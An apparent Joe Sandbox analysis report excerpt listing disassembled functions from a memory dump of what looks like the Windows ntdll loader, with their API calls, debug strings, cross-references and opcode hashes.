Part of subcall function 726471F0: __isascii.210A(0000000A,?), ref: 72647245
Part of subcall function 726471F0: isdigit.210A(00000000,?), ref: 72647253

__isascii.210A(?,00000000,?,00000000,00000000), ref: 726A30A2
isdigit.210A(?,00000000,?,00000000,00000000), ref: 726A30AD

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: __isasciiisdigit$AddressIpv4String
String ID:
API String ID: 960699662-0
Opcode ID: b95fe0d57a6b05bdc3b135903b493c9b9b7198bbef2d71f9ecb65c154a3c1a8c
Instruction ID: 6c19991ab5e02719f2cc8adaa0f0a34a33c0ffd35ef345b5bbe5cadf023fa426
Opcode Fuzzy Hash: b95fe0d57a6b05bdc3b135903b493c9b9b7198bbef2d71f9ecb65c154a3c1a8c
Instruction Fuzzy Hash: C6412636A40206AAEB068E7CD8217FE7BB59F41764F28002BEC82971C4DF348E92D754

Uniqueness

Uniqueness Score: -1.00%

Function 726D4094, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 206COMMON

Download Yara Rule

APIs

DbgPrintEx.210A(00000033,00000000,SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context,RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation,?,?,72692500,00000000,?,00000000,?), ref: 726D40DD

Part of subcall function 72683158: memset.210A(00000000,00000000,72692500,?,00000001,00000000,?,72648D40,00000000,?,?,00000030,?,?,00000001,?), ref: 72683198

DbgPrintEx.210A(00000033,00000000,SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u),RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation,00000000,?,7271F770,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000), ref: 726D413E
memcpy.210A(00000015,?,00000000,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000,72692500,00000000,?,00000000), ref: 726D4221
memcpy.210A(00000015,?,-00000F38,00000001,?,C00000E5,00000058,?,?,00000002,-00000F38,00000000,72692500,00000000,?,00000000), ref: 726D4292

Strings

SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context, xrefs: 726D40D5
SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u), xrefs: 726D4136
RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation, xrefs: 726D40D0, 726D4131

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Printmemcpy$memset
String ID: RtlpQueryFilesInAssemblyInformationActivationContextDetailedInformation$SXS: %s() received invalid file index (%u, max is %u) in Assembly (%u)$SXS: %s() received invalid sub-instance index %lu out of %lu Assemblies in the Acitvation Context
API String ID: 3998808364-2744866428
Opcode ID: 97ea651bd17f50ce0f058c6505b8a789652851ea5a987e5b9cff6c685f246eef
Instruction ID: af067ec0a6ca41967f15869bc2aa7ee93ccf5b82ad37a89b5b6f1aa5b906fd52
Opcode Fuzzy Hash: 97ea651bd17f50ce0f058c6505b8a789652851ea5a987e5b9cff6c685f246eef
Instruction Fuzzy Hash: 9081FC75E0021AEFCF05CF88C9C1AAEB7B5FF58314B14859AD805AB346D730AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 726C80B3, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 132COMMON

Download Yara Rule

APIs

RtlReleasePath.210A(?,00000000,00000001,?,?), ref: 726C8180
RtlDeleteBoundaryDescriptor.210A(?), ref: 726C8242

Strings

LdrpGetProcApphelpCheckModule, xrefs: 726C819F, 726C81F5
Loading the shim engine DLL "%wZ" failed with status 0x%08lx, xrefs: 726C8198
Getting the shim engine exports failed with status 0x%08lx, xrefs: 726C81EE
apphelp.dll, xrefs: 726C80F3
minkernel\ntdll\ldrinit.c, xrefs: 726C81A9, 726C81FF

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: BoundaryDeleteDescriptorPathRelease
String ID: Getting the shim engine exports failed with status 0x%08lx$LdrpGetProcApphelpCheckModule$Loading the shim engine DLL "%wZ" failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 2956192549-2433441700
Opcode ID: 87b2ee73f72dbf45142a28d6b5d07715677f9fbe7afda28f18ebeb3b5a40778f
Instruction ID: 9dba03cd5ffbe6a25dde4f3d01097075f3e54c792bcec10a1657c7aad6b9e8f7
Opcode Fuzzy Hash: 87b2ee73f72dbf45142a28d6b5d07715677f9fbe7afda28f18ebeb3b5a40778f
Instruction Fuzzy Hash: 8C41C0326443429FD326DA2CC885B9A77E4EB84B14F110A1BF995AB3D5DB70ED40CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 7264430B, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90stringCOMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.210A(00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,72644196,00000003,?,00000000,00000000), ref: 72644323
_strnicmp.210A(?,secserv.dll,0000000C,00000003,?,00000000,00000000,?,?,?,00000000,?,?,?,72644196,00000003), ref: 72644360
strncmp.210A(?,.txt,00000005), ref: 726A144D
strncmp.210A(?,.txt2,00000006), ref: 726A1467

Strings

.txt, xrefs: 726A1447
secserv.dll, xrefs: 7264435A
.txt2, xrefs: 726A1461

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: strncmp$HeaderImage_strnicmp
String ID: .txt$.txt2$secserv.dll
API String ID: 290936131-436433099
Opcode ID: 2ccd28aec72d1ff3fdd069d785a9c82dd42da47ffd1e5fc82ea4be4954021ab2
Instruction ID: ce763b286b44de99c16854d1a6d6a9e077f01d9f773f88749c153436bac0ee4f
Opcode Fuzzy Hash: 2ccd28aec72d1ff3fdd069d785a9c82dd42da47ffd1e5fc82ea4be4954021ab2
Instruction Fuzzy Hash: 5E21D8B0A40206BBDB06CF6ED851B9AF7B9EF40748F10616BE546975C0F730EA52CB90

Uniqueness

Uniqueness Score: -1.00%

Function 72644217, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

RtlImageNtHeaderEx.210A(00000003,?,00000000,00000000,?,?,?,00000000), ref: 72644234
strncmp.210A(?,.aspack,00000008,00000003,?,00000000,00000000,?,?,?,00000000), ref: 72644269
strncmp.210A(?,.pcle,00000006,?,?,00000000), ref: 72644281
strncmp.210A(?,.sforce,00000008,?,?,?,?,?,00000000), ref: 72644299

Strings

.pcle, xrefs: 7264427B
.aspack, xrefs: 72644263
.sforce, xrefs: 72644293

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: strncmp$HeaderImage
String ID: .aspack$.pcle$.sforce
API String ID: 3137002299-3067156003
Opcode ID: 04e48fc9854970ddb30d970508da46602e989413f8ca951b5f4cb7a918b85d54
Instruction ID: 05d3bfcd3122e942b3051de489b73d48d4ce5d62bed9bc8ab9f4bf1ac9a45f7b
Opcode Fuzzy Hash: 04e48fc9854970ddb30d970508da46602e989413f8ca951b5f4cb7a918b85d54
Instruction Fuzzy Hash: 4421F971A002016BEB108F5DDDC2B5B77F59F45344F109057ED89A62CAEF30EE91CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 726471F0, Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__isascii.210A(0000000A,?), ref: 72647245
isdigit.210A(00000000,?), ref: 72647253
__isascii.210A(0000000A,?), ref: 726A31CA
isdigit.210A(00000000,?), ref: 726A31D8

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: __isasciiisdigit
String ID:
API String ID: 2481201981-0
Opcode ID: 66c6824a6ca4091afb79815ab318d7a16c5e495096a075d48fdb0a7e8a17f2f9
Instruction ID: f4096d494eccc4f49f62be2d26ee10d32a5ed30a139110eb12949919cea46e98
Opcode Fuzzy Hash: 66c6824a6ca4091afb79815ab318d7a16c5e495096a075d48fdb0a7e8a17f2f9
Instruction Fuzzy Hash: 9271CC31A042564BDB09CAACC9A06BF77F6AF45354F20566BE883E72C4DE35CE51C760

Uniqueness

Uniqueness Score: -1.00%

Function 72702328, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 72702333

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Section$View$CloseCreateUnmapmemset
String ID: HEAP:
API String ID: 788617167-2466845122
Opcode ID: 76ef79290638603ab76aff5958b756c822f59e55e6500e8de10b6a61c6277235
Instruction ID: 1b903a9c2119dcbd49f0def518ea5247f1dd15764ae8cfe5c4fde2614249d30a
Opcode Fuzzy Hash: 76ef79290638603ab76aff5958b756c822f59e55e6500e8de10b6a61c6277235
Instruction Fuzzy Hash: FBA1E0726042128FC729CF1DC6A162AFBF1BB94310F15866EE896DB395D730D849CB91

Uniqueness

Uniqueness Score: -1.00%

Function 72651727, Relevance: 10.8, APIs: 7, Instructions: 257COMMON

Download Yara Rule

APIs

memset.210A(?,00000000,000000AA,00000000,?,?), ref: 72651759
RtlInitUnicodeStringEx.210A(?,00800000,00000000,?,?), ref: 7265180F
RtlCopyUnicodeString.210A(00AA0000,?,?,00800000,00000000,?,?), ref: 72651848
RtlUpcaseUnicodeChar.210A(00AA0000,?,00AA0000,00000000,?,?), ref: 72651876
RtlLCIDToCultureName.210A(?,00AA0000,00000000,?,?), ref: 7265190A
RtlUpcaseUnicodeString.210A(00AA0000,00AA0000,00000000,?,00AA0000,00000000,?,?), ref: 72651926
RtlIntegerToUnicodeString.210A(00000000,00000010,?,00000000,?,?), ref: 726519B0

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Unicode$String$Upcase$CharCopyCultureInitIntegerNamememset
String ID:
API String ID: 3031746878-0
Opcode ID: cb4cbc16aba57701690e228e48e230f38c4683d7cc6e336ee452527824009e19
Instruction ID: c997de60632dfa76f897ba8159f11d194aa83bdaaa6fbb6a0c8ff879989e7a19
Opcode Fuzzy Hash: cb4cbc16aba57701690e228e48e230f38c4683d7cc6e336ee452527824009e19
Instruction Fuzzy Hash: A0A1CCB2E401669BC7258F69C990779FBF9AB45204F0552E7D84AEB2C1E634DEC0CF90

Uniqueness

Uniqueness Score: -1.00%

Function 72661270, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

RtlRaiseException.210A(?), ref: 726ADC40
RtlRaiseException.210A(C0150010), ref: 726ADCB1
DbgPrintEx.210A(00000033,00000002,SXS: %s() Active frame is not the frame being deactivated %p != %p,RtlDeactivateActivationContextUnsafeFast,?,0000002C,?,00080000,00000000), ref: 726ADD5E
RtlRaiseException.210A(C0150010), ref: 726ADDFE

Strings

SXS: %s() Active frame is not the frame being deactivated %p != %p, xrefs: 726ADD4D
RtlDeactivateActivationContextUnsafeFast, xrefs: 726ADD48

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExceptionRaise$Print
String ID: RtlDeactivateActivationContextUnsafeFast$SXS: %s() Active frame is not the frame being deactivated %p != %p
API String ID: 3901562751-4142264681
Opcode ID: 98768eabddc1f0c3ce8eae2e92628da5db09362b39a154b9eb21b1cff8dcc62e
Instruction ID: 7d413458a18300e1c9d944ab10c9e6116de85b945c9366fd9d99ea7b2bfecff8
Opcode Fuzzy Hash: 98768eabddc1f0c3ce8eae2e92628da5db09362b39a154b9eb21b1cff8dcc62e
Instruction Fuzzy Hash: B38123B0908345CFD315CF19C09171AFBF5BF88348F505A2EE59A9B290D375DA86CB86

Uniqueness

Uniqueness Score: -1.00%

Function 7265C370, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

RtlAcquireSRWLockExclusive.210A(727384D8,?,00000000,00000000), ref: 7265C3F8
RtlReleaseSRWLockExclusive.210A(727384D8,727384D8,?,00000000,00000000), ref: 7265C458

Strings

LdrResolveDelayLoadedAPI:Unable to locate DLL based at 0x%p.Status = 0x%x, xrefs: 726ABE00
minkernel\ntdll\ldrdload.c, xrefs: 726ABDC6, 726ABE11
LdrResolveDelayLoadedAPI:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 726ABDB5
LdrResolveDelayLoadedAPI, xrefs: 726ABDBC, 726ABE07

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: LdrResolveDelayLoadedAPI$LdrResolveDelayLoadedAPI:Unable to locate DLL based at 0x%p.Status = 0x%x$LdrResolveDelayLoadedAPI:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrdload.c
API String ID: 17069307-1756274442
Opcode ID: 9f06241bd33ff813f759f3411c38e148410663ba04253085117057b498e290b7
Instruction ID: 6cbf8d4f4adcc469d215ab26873f012bd5415781d2d0a1bba99a04962668176a
Opcode Fuzzy Hash: 9f06241bd33ff813f759f3411c38e148410663ba04253085117057b498e290b7
Instruction Fuzzy Hash: E751E071A0025A9FD712CF6ECA90F6A7BB5AF44B54F10462BEC52AB2C1D774D840CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 726594F0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

RtlValidSid.210A(00000050,?), ref: 72659513
wcscpy_s.210A(?,00000100,S-1-,00000000,00000050,?), ref: 7265953A

Part of subcall function 726596B0: memcpy.210A(00000000,?,?,?,00000050,?,00000000), ref: 72659771

memcpy.210A(?,?,00000000,00000000,000000FC,?,00000000,00000050,?), ref: 72659653
RtlCreateUnicodeString.210A(?,?,00000000,000000FC,?,00000000,00000050,?), ref: 72659693
wcscat_s.210A(?,00000100,72632944,00000000,00000050,?), ref: 726AAE21

Strings

S-1-, xrefs: 72659529

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memcpy$CreateStringUnicodeValidwcscat_swcscpy_s
String ID: S-1-
API String ID: 1445283056-1273753892
Opcode ID: b61e102688f3629957ff88ac7ed77d711dfcc23b9dddb33a234bd7e1d5e4c757
Instruction ID: a551e4b98e36b024bd1fe56fa6b6776deb8966e567a97fd47d3be525f2513c8a
Opcode Fuzzy Hash: b61e102688f3629957ff88ac7ed77d711dfcc23b9dddb33a234bd7e1d5e4c757
Instruction Fuzzy Hash: 2451F5B19011A55AEB258B2DCC547A9FBF5AB01300F1541ABD8AA972C0F3349F98CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 726567E0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

RtlReleasePath.210A(00000001), ref: 726568B8

Strings

Status: 0x%08lx, xrefs: 726AA140
Nonpackaged process attempted to load a packaged DLL., xrefs: 726AA103
minkernel\ntdll\ldrapi.c, xrefs: 726AA0C4, 726AA114, 726AA151
LdrLoadDll, xrefs: 726AA0BA, 726AA10A, 726AA147
DLL name: %wZ, xrefs: 726AA0B3

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: PathRelease
String ID: DLL name: %wZ$LdrLoadDll$Nonpackaged process attempted to load a packaged DLL.$Status: 0x%08lx$minkernel\ntdll\ldrapi.c
API String ID: 1338757038-382380096
Opcode ID: 792b670dcf0f18b5ce4c22cd39156c6e0522a60a9a248991fae9ee7fa1bf2b21
Instruction ID: 3fb7986007ebd936b9dd4e44bc4320dcefdc16cd1cbe46b07704e0b4aaa46b99
Opcode Fuzzy Hash: 792b670dcf0f18b5ce4c22cd39156c6e0522a60a9a248991fae9ee7fa1bf2b21
Instruction Fuzzy Hash: E931E472B043469BE312DA1DC941B567BF6AB84719F04492FFE815B2C2D768EC40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 72687470, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

memset.210A(?,00000000,00000030,?,00000000,00000000), ref: 726874A5
RtlDebugPrintTimes.210A(?,00000030,00000030,00000030), ref: 7268752F
RtlAcquireSRWLockExclusive.210A(?,?,00000000,00000000), ref: 72687568
RtlReleaseSRWLockExclusive.210A(?,?,?,00000000,00000000), ref: 7268759D

Strings

0, xrefs: 726874FA
0, xrefs: 7268750F

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: ExclusiveLock$AcquireDebugPrintReleaseTimesmemset
String ID: 0$0
API String ID: 3207447552-203156872
Opcode ID: 70328c814769e0a880d3774ea16351765f1d0cba236fd3eaa5983ccac7ce95b9
Instruction ID: b651fec52b2a6d1c2fa1e2691e59fbbe0c98647b28f587b9bba1f9627baee394
Opcode Fuzzy Hash: 70328c814769e0a880d3774ea16351765f1d0cba236fd3eaa5983ccac7ce95b9
Instruction Fuzzy Hash: A6416BB5A087019FC302CF2CC584A1ABBE5BF89314F14492EF889DB381D771EA45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 72644530, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

DbgPrint.210A(RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,00000000,?,726B2DB4,C000000D,?,?,?,00000000,?,00000000,?,?), ref: 726A1662
DbgPrint.210A(RTL: Edit ntos\rtl\generr.c to correct the problem,RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping,?,?,?,00000000,?,726B2DB4,C000000D,?,?,?,00000000,?,00000000,?), ref: 726A166C
DbgPrint.210A(RTL: ERROR_MR_MID_NOT_FOUND is being returned,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?), ref: 726A1679

Strings

RTL: ERROR_MR_MID_NOT_FOUND is being returned, xrefs: 726A1674
RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping, xrefs: 726A165D
RTL: Edit ntos\rtl\generr.c to correct the problem, xrefs: 726A1667

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: Print
String ID: RTL: ERROR_MR_MID_NOT_FOUND is being returned$RTL: Edit ntos\rtl\generr.c to correct the problem$RTL: RtlNtStatusToDosError(0x%lx): No Valid Win32 Error Mapping
API String ID: 3558298466-1070408152
Opcode ID: be6cecf0108728fcd40905cf9d8f4308a081009a8a4ac00ab5b96dd158328261
Instruction ID: b9f61791065cd382ab83f5032c8aab285908e0c73c69f86ea656f8115f3ab4a3
Opcode Fuzzy Hash: be6cecf0108728fcd40905cf9d8f4308a081009a8a4ac00ab5b96dd158328261
Instruction Fuzzy Hash: DB216773A1400286FB1E522DDC5277C32A6DB40364F21772BE5C3CA1C5EF58DEA0C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 7264F505, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 7264F5F5: memcpy.210A(72737C54,?,00000040,00000000,00000000,000000FF,?,?,7264F534,7271F258,00000038,7264E839), ref: 7264F651
Part of subcall function 7264F5F5: memcpy.210A(?,?,?,?,0000FFFF,?,00000000,00000000,000000FF,?,?,7264F534,7271F258,00000038,7264E839), ref: 7264F70B

RtlActivateActivationContextUnsafeFast.210A(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 7264F59A

Strings

Uninitializing DLL "%wZ" (Init routine: %p), xrefs: 726A6E5B
LdrpProcessDetachNode, xrefs: 726A6E62
9dr, xrefs: 7264F5B4
$, xrefs: 7264F57C
minkernel\ntdll\ldrsnap.c, xrefs: 726A6E6C

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: memcpy$ActivateActivationContextFastUnsafe
String ID: $$9dr$LdrpProcessDetachNode$Uninitializing DLL "%wZ" (Init routine: %p)$minkernel\ntdll\ldrsnap.c
API String ID: 2422247448-3775192126
Opcode ID: e1621183cfeadb6897c1f3324d9c67f8f72fe1c68f51bc4b7f8e5e6c21a60938
Instruction ID: d003f03c987f61d4b781e5d613d2a2f4a99362c56c323b9d29ef8b0b0f99e001
Opcode Fuzzy Hash: e1621183cfeadb6897c1f3324d9c67f8f72fe1c68f51bc4b7f8e5e6c21a60938
Instruction Fuzzy Hash: 1C315070D01245DBDF29CF6CC584A9DBBB5BF19304F1081ABD542AF2C4DB75AA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 72651025, Relevance: 9.3, APIs: 6, Instructions: 321COMMON

Download Yara Rule

APIs

RtlFirstFreeAce.210A(?,00000000,00000000,?,00000000,?,72655333,00000001,?,00000001,00000001,?,?,00000000,?,00000000), ref: 7265107B
memcpy.210A(00000000,000000D0,?,?,00000000,00000000,?,00000000,?,72655333,00000001,?,00000001,00000001,?,?), ref: 7265110E
RtlMapGenericMask.210A(00000004,?,00000000,?,00000000,?,72655333,00000001,?,00000001,00000001,?,?,00000000), ref: 7265112D
RtlFindAceByType.210A(?,00000011,00000000,?,00000000,00000000,?,00000000,?,72655333,00000001,?,00000001,00000001,?,?), ref: 72651288

Memory Dump Source

Source File: 00000000.00000002.1331010506.0000000072621000.00000020.00020000.sdmp, Offset: 72620000, based on PE: true

Associated: 00000000.00000002.1331001792.0000000072620000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1331746034.0000000072735000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.1331766168.000000007273B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1331785335.000000007273F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72620000_y98WYYcJ2U.jbxd

Similarity

API ID: FindFirstFreeGenericMaskTypememcpy
String ID:
API String ID: 460004742-0
Opcode ID: b6dd5b9ec23ef66be4ad94219137caba7c3484fe4cbce340484b20cc0024aed9
Instruction ID: 7e461205e298836630ba0e32a47cf5e52b7e33254f3767b74be7b7b74f723f84
Opcode Fuzzy Hash: b6dd5b9ec23ef66be4ad94219137caba7c3484fe4cbce340484b20cc0024aed9
Instruction Fuzzy Hash: F8C1C4B0D042599FDF12CFADC8907EDBBB6AF0A308F0491D7E885A7281C3359946CB64

Uniqueness

Uniqueness Score: -1.00%

Function 7270D2DF, Relevance: 9.2, APIs: 6, Instructions: 160timeCOMMON

Download Yara Rule

APIs

RtlAcquireSRWLockShared.210A(?,000000FE,?,?,?,?,7270C3F8,000000FE), ref: 7270D3D0
RtlAcquireSRWLockExclusive.210A(?,000000FE,?,?,?), ref: 7270D3E6
